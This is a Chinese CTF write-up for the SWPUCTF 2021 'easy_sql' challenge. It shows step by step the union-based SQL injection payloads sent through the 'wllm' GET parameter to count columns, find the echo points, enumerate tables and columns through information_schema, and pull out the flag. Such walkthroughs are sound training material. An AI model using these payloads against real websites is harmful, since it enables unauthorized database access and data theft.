[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析

查看网页

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析_第1张图片

有提示,参数是wllm,并且要我们输入点东西

所以,我们尝试以get方式传入

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析_第2张图片

有回显,但似乎没啥用

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析_第3张图片

从上图看应该是字符型漏洞,单引号字符注入

先查看字段数

/?wllm=2'order by 3--+

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析_第4张图片

没回显

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析_第5张图片

报错了,说明字段数是3

然后查看回显点

/?wllm=2'union select 1,2,3--+

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析_第6张图片

注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。

然后查看数据库名称

/?wllm=2'union select 1,2,database()--+

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析_第7张图片

得到数据库名称就可以按顺序数据库-表-列来找flag了

/?wllm=2'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析_第8张图片

?wllm=2'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析_第9张图片

/?wllm=2'union select 1,2,flag from test_tb--+

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析_第10张图片

你可能感兴趣的:(Web,web安全,安全,网络安全,sql)